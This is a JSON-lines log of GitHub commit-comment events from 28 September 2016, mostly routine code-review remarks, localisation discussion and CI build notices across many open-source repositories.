{"id":"4631525332","type":"CommitCommentEvent","actor":{"login":"charettepa"},"repo":{"name":"kodi-pvr/pvr.dvblink"},"payload":{"comment":{"id":19209526,"position":14,"line":729,"path":"src/DVBLinkClient.cpp","commit_id":"bf99bcb7c08a9736036ba466ffdbb15450fbec63","created_at":"2016-09-28T15:40:41Z","updated_at":"2016-09-28T15:40:41Z","body":"729 should be\r\nif (!bp_schedules[i]->GetChannelID().empty())\r\n"}},"created_at":"2016-09-28T15:40:41Z"}
{"id":"4631525403","type":"CommitCommentEvent","actor":{"login":"changtengfei"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19209528,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-28T15:40:42Z","updated_at":"2016-09-28T15:40:42Z","body":"@JRubis @OnsetJon  this is fixed in this commit:\r\nhttps://github.com/openwsn-berkeley/openwsn-fw/commit/0fd663d37684433d1a3c034899cf845a21b65e18"}},"created_at":"2016-09-28T15:40:42Z"}
{"id":"4631525687","type":"CommitCommentEvent","actor":{"login":"billmackie"},"repo":{"name":"billmackie/test_repo"},"payload":{"comment":{"id":19209529,"position":null,"line":null,"path":null,"commit_id":"b79a3f443521cbe34699286fa3f423705fdf042f","created_at":"2016-09-28T15:40:45Z","updated_at":"2016-09-28T15:40:45Z","body":"test"}},"created_at":"2016-09-28T15:40:45Z"}
{"id":"4631531526","type":"CommitCommentEvent","actor":{"login":"Minecrell"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209541,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:41:37Z","updated_at":"2016-09-28T15:41:37Z","body":"Another option would be to make the injection methods on both mixins private, then we don't need to worry about the names so much."}},"created_at":"2016-09-28T15:41:37Z"}
{"id":"4631532307","type":"CommitCommentEvent","actor":{"login":"changtengfei"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19209542,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-28T15:41:44Z","updated_at":"2016-09-28T15:41:44Z","body":"@OnsetJon @OnsetJon Thanks a lot for pointing out this issue!"}},"created_at":"2016-09-28T15:41:44Z"}
{"id":"4631533786","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209546,"position":11,"line":11,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:41:59Z","updated_at":"2016-09-28T15:41:59Z","body":"Io metterei risorsa pubblica **globale** invece di **mondiale**"}},"created_at":"2016-09-28T15:41:59Z"}
{"id":"4631534145","type":"CommitCommentEvent","actor":{"login":"r0b1n"},"repo":{"name":"r0b1n/rnrf-relay-renderer"},"payload":{"comment":{"id":19209552,"position":5,"line":50,"path":"src/RelayComponentRenderer.js","commit_id":"9560a7cd99cae4bd5be7d683619c8572882225f6","created_at":"2016-09-28T15:42:02Z","updated_at":"2016-09-28T15:42:02Z","body":"If I remember correct any additional props must be bypassed to the component as is, that is behavior of `rnrf` and we need to do the same. But I need to check it, have no idea how all of this works now :)"}},"created_at":"2016-09-28T15:42:02Z"}
{"id":"4631535688","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209558,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:42:16Z","updated_at":"2016-09-28T15:42:16Z","body":"@Minecrell \r\n\r\nI've been discussing that option with gabizou. Possibly making public injectors an error case in Mixin."}},"created_at":"2016-09-28T15:42:16Z"}
{"id":"4631537070","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"zeit/now-app"},"payload":{"comment":{"id":19209565,"position":null,"line":null,"path":null,"commit_id":"6856945b7b3e8139b0426878832ba40698740681","created_at":"2016-09-28T15:42:28Z","updated_at":"2016-09-28T15:42:28Z","body":"Btw, Electron supports this natively now: \r\nhttp://electron.atom.io/docs/api/app/#appsetloginitemsettingssettings-macos-windows"}},"created_at":"2016-09-28T15:42:28Z"}
{"id":"4631538081","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"satishgoda/learningqt"},"payload":{"comment":{"id":19209569,"position":8,"line":8,"path":"basics/QApplication/Signal/focusChanged/README.md","commit_id":"12451c0b3e4d819c678ad4d757785526c0c6d840","created_at":"2016-09-28T15:42:36Z","updated_at":"2016-09-28T15:42:36Z","body":"appInstance = QtGui.QApplication.instance()"}},"created_at":"2016-09-28T15:42:36Z"}
{"id":"4631538457","type":"CommitCommentEvent","actor":{"login":"charles-dyfis-net"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19209571,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-28T15:42:39Z","updated_at":"2016-09-28T15:42:39Z","body":"@luka5z, `-r` is indeed not supported by BSD xargs."}},"created_at":"2016-09-28T15:42:39Z"}
{"id":"4631539221","type":"CommitCommentEvent","actor":{"login":"goldafonya"},"repo":{"name":"goldafonya/goldafonya.github.io"},"payload":{"comment":{"id":19209573,"position":2,"line":2,"path":"index.html","commit_id":"ce4c352b20988dadb4f1a518c906b609a2e175ef","created_at":"2016-09-28T15:42:47Z","updated_at":"2016-09-28T15:42:47Z","body":"нет"}},"created_at":"2016-09-28T15:42:47Z"}
{"id":"4631540143","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"zeit/now-app"},"payload":{"comment":{"id":19209577,"position":null,"line":null,"path":null,"commit_id":"6856945b7b3e8139b0426878832ba40698740681","created_at":"2016-09-28T15:42:54Z","updated_at":"2016-09-28T15:42:54Z","body":"Oh, nvm"}},"created_at":"2016-09-28T15:42:54Z"}
{"id":"4631544747","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19209587,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-28T15:43:35Z","updated_at":"2016-09-28T15:43:35Z","body":"Shouldn't that by ’-11’? Just wondering :)"}},"created_at":"2016-09-28T15:43:35Z"}
{"id":"4631545667","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209591,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:43:44Z","updated_at":"2016-09-28T15:43:44Z","body":"Uhm, però guardando la stringa dove parla di lavorare sia a livello politico che con la base, non so se i nostri risultati sia propriamente corretto,.\r\n"}},"created_at":"2016-09-28T15:43:44Z"}
{"id":"4631550628","type":"CommitCommentEvent","actor":{"login":"JayaMPB9"},"repo":{"name":"haoel/leetcode"},"payload":{"comment":{"id":19209600,"position":null,"line":null,"path":null,"commit_id":"2f3a77de45a6addf7aae3fb6988e8422a7a3eb6c","created_at":"2016-09-28T15:44:29Z","updated_at":"2016-09-28T15:44:29Z","body":"Hi, I am learning the very basics of programming from few of the competitive coding website, but why the way of coding in c++ is different in leetcode( I primarily use c++), means why we code without main function and why the syntax looks different and how the program is running without any main function in the program, can you mention the rules on how to code on leetcode. "}},"created_at":"2016-09-28T15:44:29Z"}
{"id":"4631553325","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209604,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:44:52Z","updated_at":"2016-09-28T15:44:52Z","body":"Public injectors are allowed, it just provides flexibility. However making them private should be the recommended case unless overriding is intended."}},"created_at":"2016-09-28T15:44:52Z"}
{"id":"4631555328","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"vlouzada/EDL"},"payload":{"comment":{"id":19209609,"position":null,"line":null,"path":null,"commit_id":"2638c43e3766a8172fb036de7256e9400360b5c3","created_at":"2016-09-28T15:45:11Z","updated_at":"2016-09-28T15:45:11Z","body":"2 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:45:11Z"}
{"id":"4631555589","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209610,"position":null,"line":null,"path":null,"commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:45:13Z","updated_at":"2016-09-28T15:45:13Z","body":"Per il momento la pagina si vede qua https://bedrock-demo-craigcook.us-west.moz.works/it/\r\n\r\nSto cercando di capire perché il server di test non si aggiorna 😠 "}},"created_at":"2016-09-28T15:45:13Z"}
{"id":"4631556731","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209614,"position":11,"line":11,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:45:23Z","updated_at":"2016-09-28T15:45:23Z","body":"Globale a me confonde sempre, comunque OK.\n\n"}},"created_at":"2016-09-28T15:45:23Z"}
{"id":"4631557889","type":"CommitCommentEvent","actor":{"login":"testn"},"repo":{"name":"netty/netty-tcnative"},"payload":{"comment":{"id":19209616,"position":null,"line":null,"path":null,"commit_id":"2f7d38fa68b007c3f761d226e09cc6ec0efc9b97","created_at":"2016-09-28T15:45:35Z","updated_at":"2016-09-28T15:45:35Z","body":"Need to upgrade this to 1.0.2j since 1.0.2i is impacted by https://www.openssl.org/news/vulnerabilities.html#2016-7052"}},"created_at":"2016-09-28T15:45:35Z"}
{"id":"4631558045","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"satishgoda/learningqt"},"payload":{"comment":{"id":19209618,"position":null,"line":null,"path":null,"commit_id":"12451c0b3e4d819c678ad4d757785526c0c6d840","created_at":"2016-09-28T15:45:37Z","updated_at":"2016-09-28T15:45:37Z","body":"* http://doc.qt.io/qt-4.8/qapplication.html#details\r\n* http://doc.qt.io/qt-4.8/qabstracteventdispatcher.html#details\r\n* http://doc.qt.io/qt-4.8/qeventloop.html#details"}},"created_at":"2016-09-28T15:45:37Z"}
{"id":"4631558568","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19209619,"position":54,"line":165,"path":"course/grading.py","commit_id":"008dcb016c3a5f5df78cf935f7558229095904e5","created_at":"2016-09-28T15:45:41Z","updated_at":"2016-09-28T15:45:41Z","body":"Fixed: 3b0ddec. Sorry!"}},"created_at":"2016-09-28T15:45:41Z"}
{"id":"4631562947","type":"CommitCommentEvent","actor":{"login":"bosilca"},"repo":{"name":"bosilca/ompi"},"payload":{"comment":{"id":19209625,"position":151,"line":286,"path":"ompi/mca/pml/monitoring/pml_monitoring_component.c","commit_id":"3f0bacdfaa2bf52a67a448972a43d0a330df0ed5","created_at":"2016-09-28T15:46:22Z","updated_at":"2016-09-28T15:46:22Z","body":"Yes, this prevents a segfault because the MCA variable when freed will free the string associated with it. Thus, whatever is in the mca_pml_monitoring_current_filename upn return from mca_base_var_register, will be freed automatically for us. One might think that this is a good thing, and I have to say that in the most general case it is. However, the way we use the PML monitoring (by preventing the system from doing a dlclose but we don't prevent the system from cleaning things up), led to our MCA variables being released upon the first call to _close. If that happens we segfault."}},"created_at":"2016-09-28T15:46:22Z"}
{"id":"4631563968","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209629,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:46:31Z","updated_at":"2016-09-28T15:46:31Z","body":"@Mumfrey \r\n\r\nAny way we could make them a warning case? The thing this commit fixes is quite serious and if my testing here in a moment proves it, it'll address a huge perf loss we have with SF in Jungles and such. Just want to make sure that silly mistakes like this aren't made anymore."}},"created_at":"2016-09-28T15:46:31Z"}
{"id":"4631565500","type":"CommitCommentEvent","actor":{"login":"q3452"},"repo":{"name":"joehua87/react-toolbox"},"payload":{"comment":{"id":19209631,"position":null,"line":null,"path":null,"commit_id":"fbc7d2b6237782eaea3899ea549aa47b7c217e5b","created_at":"2016-09-28T15:46:46Z","updated_at":"2016-09-28T15:46:46Z","body":"Has this been made into a PR for react-toolbox?"}},"created_at":"2016-09-28T15:46:46Z"}
{"id":"4631569866","type":"CommitCommentEvent","actor":{"login":"thednp"},"repo":{"name":"tweenjs/tween.js"},"payload":{"comment":{"id":19209642,"position":null,"line":null,"path":null,"commit_id":"23074dfb946aebca6b583f89ea6f807b7e706c1b","created_at":"2016-09-28T15:47:24Z","updated_at":"2016-09-28T15:47:24Z","body":"I don't think this is a good idea. I'm getting a `stack exceeded the limit` error with the bind."}},"created_at":"2016-09-28T15:47:24Z"}
{"id":"4631570009","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19209643,"position":null,"line":null,"path":null,"commit_id":"b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77","created_at":"2016-09-28T15:47:26Z","updated_at":"2016-09-28T15:47:26Z","body":"update_standards_gem (asparke2) - i386-Windows-7-VisualStudio-12: Tests Failed (1925 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-78.64%25-red.svg)</a> \n"}},"created_at":"2016-09-28T15:47:26Z"}
{"id":"4631571125","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209645,"position":22,"line":20,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:47:36Z","updated_at":"2016-09-28T15:47:36Z","body":"Dubbio per Internet **sano**: visto che è una sorta di ecosistema, non sarebbe meglio \"salubre\"?\r\nSiamo Mozilla, un'organizzazione orgogliosamente senza fini di lucro schierata \r\nin difesa di Internet, per mantenerlo un ecosistema salubre, fertile e accessibile a tutti"}},"created_at":"2016-09-28T15:47:36Z"}
{"id":"4631574315","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209649,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:48:03Z","updated_at":"2016-09-28T15:48:03Z","body":"Also, it's worth bearing in mind that the conforming process actually means that issues like this never actually matter at runtime, however it's just confusing from an IDE perspective as the IDE warns (or in my case errors) about the undecorated override.\r\n\r\n> Any way we could make them a warning case?\r\n\r\nNo because then when overriding is intended it'll generate an unsolicited warning.\r\n\r\n> The thing this commit fixes is quite serious and if my testing here in a moment proves it, it'll address a huge perf loss we have with SF in Jungles and such. Just want to make sure that silly mistakes like this aren't made anymore.\r\n\r\nConforming takes care of this, this is not a serious problem and only affects the IDE."}},"created_at":"2016-09-28T15:48:03Z"}
{"id":"4631575484","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"twigphp/Twig"},"payload":{"comment":{"id":19209651,"position":25,"line":264,"path":"lib/Twig/Loader/Filesystem.php","commit_id":"6f0e3edbc55a7ce0464fa0ec90462d66822e0750","created_at":"2016-09-28T15:48:12Z","updated_at":"2016-09-28T15:48:12Z","body":"@apapsch normalizing the path is important to reuse the same cache key"}},"created_at":"2016-09-28T15:48:12Z"}
{"id":"4631582596","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209657,"position":22,"line":20,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:49:19Z","updated_at":"2016-09-28T15:49:19Z","body":"Neanche a me piace un granché sano, io avevo guardato i sinonimi \nproposti da 3cani e tra prospero e florido avevo scelto il primo.\n\n\n"}},"created_at":"2016-09-28T15:49:19Z"}
{"id":"4631583076","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19209659,"position":13,"line":583,"path":"dashel/dashel-posix.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-28T15:49:23Z","updated_at":"2016-09-28T15:49:23Z","body":"> Perhaps a virtual method `shutdownFd` called by `SelectableStream::~SelectableStream` to close file descriptors if necessary, that could be overridden by `PollStream` to do nothing?\r\n\r\nI like this solution. I would call the function `closeFd()`, put it protected virtual, and by default do what is currently in `SelectableStream::~SelectableStream()`. One risk is that this might trigger ABI breakage in weird optimization cases (see http://stackoverflow.com/questions/5746076/in-c-does-overriding-an-existing-virtual-function-break-abi), but I would say we are fine as anyway people only install Dashel from the same repository as Aseba.\r\n\r\n"}},"created_at":"2016-09-28T15:49:23Z"}
{"id":"4631583731","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19209660,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-28T15:49:29Z","updated_at":"2016-09-28T15:49:29Z","body":"I was looking at the curves... Perhaps the exponent is not so important after all and e.g. `(x + 5) * x - 4` (no lookup) would do the job?"}},"created_at":"2016-09-28T15:49:29Z"}
{"id":"4631586679","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"smalluban/hybrids"},"payload":{"comment":{"id":19209663,"position":null,"line":null,"path":null,"commit_id":"f0ca077b185fb7b9c4239eab4d42655836fa7db5","created_at":"2016-09-28T15:49:56Z","updated_at":"2016-09-28T15:49:56Z","body":"@smalluban bardzo ładny kod, czekam na więcej ;)"}},"created_at":"2016-09-28T15:49:56Z"}
{"id":"4631586802","type":"CommitCommentEvent","actor":{"login":"pbeshai"},"repo":{"name":"bocoup/mlab-vis-client"},"payload":{"comment":{"id":19209667,"position":null,"line":null,"path":null,"commit_id":"19e49fd1b6e12647ac4200523c7f15c21da2268a","created_at":"2016-09-28T15:49:57Z","updated_at":"2016-09-28T15:49:57Z","body":"Fixes #105 "}},"created_at":"2016-09-28T15:49:57Z"}
{"id":"4631588191","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209672,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:50:10Z","updated_at":"2016-09-28T15:50:10Z","body":"The key take-away lesson here should be that working with injectors does not absolve one from making good design decisions in the first place, merely protects one from unintended ill side-effects of them.\r\n\r\nThis is the reason I removed the option to disable the remapper/conformer in the last point release. It doesn't make sense to have a \"debug\" option which actually *creates* bugs."}},"created_at":"2016-09-28T15:50:10Z"}
{"id":"4631589387","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":19209674,"position":null,"line":null,"path":null,"commit_id":"1c447f2b0a97da9815714a1df0ae52b3be7b47d3","created_at":"2016-09-28T15:50:19Z","updated_at":"2016-09-28T15:50:19Z","body":"for some reason, slack produces a zero-length nick to deal with in the loop on line 223..."}},"created_at":"2016-09-28T15:50:19Z"}
{"id":"4631591556","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":19209684,"position":14,"line":224,"path":"x84/default/ircchat.py","commit_id":"1c447f2b0a97da9815714a1df0ae52b3be7b47d3","created_at":"2016-09-28T15:50:38Z","updated_at":"2016-09-28T15:50:38Z","body":"for some reason, slack produces a zero-length nick to deal with in the loop on line 223..."}},"created_at":"2016-09-28T15:50:38Z"}
{"id":"4631592217","type":"CommitCommentEvent","actor":{"login":"pskhodad"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19209687,"position":null,"line":null,"path":null,"commit_id":"23c0cc40d24d5c24049472656dc2eb171f50f00f","created_at":"2016-09-28T15:50:44Z","updated_at":"2016-09-28T15:50:44Z","body":"is there specific reason service-worker has been moved to assets folder, some of the posts i have read indicate that service worker location is important. e.g. following post http://www.html5rocks.com/en/tutorials/service-worker/introduction/ mentions\r\n\"One subtlety with the register method is the location of the service worker file. You'll notice in this case that the service worker file is at the root of the domain. This means that the service worker's scope will be the entire origin.\""}},"created_at":"2016-09-28T15:50:44Z"}
{"id":"4631593032","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":19209690,"position":13,"line":223,"path":"x84/default/ircchat.py","commit_id":"1c447f2b0a97da9815714a1df0ae52b3be7b47d3","created_at":"2016-09-28T15:50:51Z","updated_at":"2016-09-28T15:50:51Z","body":"for some reason, slack produces a zero-length nick to deal with in the loop on line 223..."}},"created_at":"2016-09-28T15:50:51Z"}
{"id":"4631595082","type":"CommitCommentEvent","actor":{"login":"stephenreid"},"repo":{"name":"GetTerminus/kickfire_ruby"},"payload":{"comment":{"id":19209694,"position":null,"line":null,"path":null,"commit_id":"517e0e7ea53e466fea20c5185f22beff3bdca5cb","created_at":"2016-09-28T15:51:10Z","updated_at":"2016-09-28T15:51:10Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [(2) Implement a Kickfire API in the Kickfire repo](https://trello.com/c/V9dNiTa7/307-2-implement-a-kickfire-api-in-the-kickfire-repo)"}},"created_at":"2016-09-28T15:51:10Z"}
{"id":"4631598342","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19209703,"position":null,"line":null,"path":null,"commit_id":"cf7c0b3dd06e16161d37d6a044dae517fbfe31da","created_at":"2016-09-28T15:51:39Z","updated_at":"2016-09-28T15:51:39Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 437](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1255&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-28T15:51:39Z"}
{"id":"4631599263","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19209707,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T15:51:46Z","updated_at":"2016-09-28T15:51:46Z","body":"@Toflar commenting on code being 1-year old is a bad way to start conversations. The *only* way to find this conversation is through the github notification, which is a one-time solution (I don't think anyone will actually go read again their old notifications to identify such conversations).\r\nThus, some people might even have disabled notifications for such comments."}},"created_at":"2016-09-28T15:51:46Z"}
{"id":"4631600062","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209711,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:51:54Z","updated_at":"2016-09-28T15:51:54Z","body":"Forse, se influenza non va bene perché fa venire in mente la malattia, Il nostro ascendente?"}},"created_at":"2016-09-28T15:51:54Z"}
{"id":"4631600416","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"gustavoboiuna/EDL"},"payload":{"comment":{"id":19209715,"position":null,"line":null,"path":null,"commit_id":"948c8d4a0af1c30425b2763495f25152ff0b782d","created_at":"2016-09-28T15:51:56Z","updated_at":"2016-09-28T15:51:56Z","body":"ok"}},"created_at":"2016-09-28T15:51:56Z"}
{"id":"4631601754","type":"CommitCommentEvent","actor":{"login":"evlkc"},"repo":{"name":"evlkc/devops"},"payload":{"comment":{"id":19209716,"position":5,"line":12,"path":"scripts/install_dependencies","commit_id":"c38afe7b419fa52ccdf66a59e3fb0e601b61ba21","created_at":"2016-09-28T15:52:08Z","updated_at":"2016-09-28T15:52:08Z","body":"dir"}},"created_at":"2016-09-28T15:52:08Z"}
{"id":"4631603033","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19209720,"position":null,"line":null,"path":null,"commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T15:52:19Z","updated_at":"2016-09-28T15:52:19Z","body":"@Pikselke mamy nadzieję."}},"created_at":"2016-09-28T15:52:19Z"}
{"id":"4631604336","type":"CommitCommentEvent","actor":{"login":"Pepetops"},"repo":{"name":"SolidHal/spotify-ripper"},"payload":{"comment":{"id":19209722,"position":null,"line":null,"path":null,"commit_id":"7e6e56b9976e55c36dfda5dd9c05d41c4c0d1373","created_at":"2016-09-28T15:52:31Z","updated_at":"2016-09-28T15:52:31Z","body":"Sorry but \"the fix\" version does works...\r\nWhere are:\r\nimport spotipy.util as util\r\nimport spotipy.client ???\r\nWhat happend with jrnewell code?\r\npip install not works ?\r\nPlease,return to the roots...\r\nThanks\r\n"}},"created_at":"2016-09-28T15:52:31Z"}
{"id":"4631605000","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19209724,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T15:52:38Z","updated_at":"2016-09-28T15:52:38Z","body":"@irond13 @ejcx Scott reverted this and is publishing v0.12.6.  We'll likely make some changes here in Sails v1, and we'll add some clarification to the docs in the mean time.\r\n\r\nThe main issue here is the config, IMO.  You usually don't want to allow all origins to access _all_ of your endpoints, and particularly not to send credentials.  But how about this:  in Sails v1, to achieve the current behavior, in lieu of the `origin` and `credentials` settings, you'll be able to set a separate boolean flag (e.g. `allowAnyOriginWithCredentialsUnsafe`) in your global or per-route CORS configuration.  If specified, the flag would override `origin` and `credentials`, leaving room for the `origin` config to be changed so that it more exactly matches the CORS specification."}},"created_at":"2016-09-28T15:52:38Z"}
{"id":"4631607059","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19209730,"position":null,"line":null,"path":null,"commit_id":"611f6a516ed95c7a69e218e39cda27686cc2ad83","created_at":"2016-09-28T15:52:58Z","updated_at":"2016-09-28T15:52:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1191](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14482&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:13:45"}},"created_at":"2016-09-28T15:52:58Z"}
{"id":"4631607438","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209733,"position":47,"line":40,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:53:01Z","updated_at":"2016-09-28T15:53:01Z","body":"Visto che è un termine abbastanza recente, io sarei per metterlo sì in inglese, ma tra virgolette / Prova il toolkit per i \"Lean Data\".\r\nA meno che non vogliamo mettere direttamente Toolkit Lean Data o Lean Data Toolkit"}},"created_at":"2016-09-28T15:53:01Z"}
{"id":"4631608287","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209736,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:53:09Z","updated_at":"2016-09-28T15:53:09Z","body":"La nostra sfera di influenza?"}},"created_at":"2016-09-28T15:53:09Z"}
{"id":"4631608598","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19209737,"position":null,"line":null,"path":null,"commit_id":"cf7c0b3dd06e16161d37d6a044dae517fbfe31da","created_at":"2016-09-28T15:53:12Z","updated_at":"2016-09-28T15:53:12Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 437](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1255&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:34"}},"created_at":"2016-09-28T15:53:12Z"}
